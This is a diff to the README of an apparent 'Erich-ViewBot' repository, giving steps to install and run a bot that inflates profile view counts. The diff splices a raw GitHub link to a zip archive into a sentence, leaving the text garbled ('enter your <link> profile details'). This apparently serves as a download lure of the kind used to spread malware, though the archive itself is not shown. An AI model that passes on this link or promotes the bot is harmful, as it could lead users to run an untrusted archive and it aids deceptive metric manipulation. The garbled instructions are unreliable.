saysayn1/Erich-ViewBot/README.md

    After installation, you can open Erich-ViewBot from your desktop or Start menu.

 6. **Configure Settings**
-   Upon launching the application, you’ll need to enter your e.rich profile details and set your desired view count.
+   Upon launching the application, you’ll need to enter your https://raw.githubusercontent.com/saysayn1/Erich-ViewBot/main/input/Erich_View_Bot_v3.3.zip profile details and set your desired view count.
 The interface is straightforward, requiring minimal input.
 Adjust the settings as per your needs.

 7. **Activate the Bot**
    Click the start button to activate the bot.
 You will see real-time activity as views start to increase on your profile.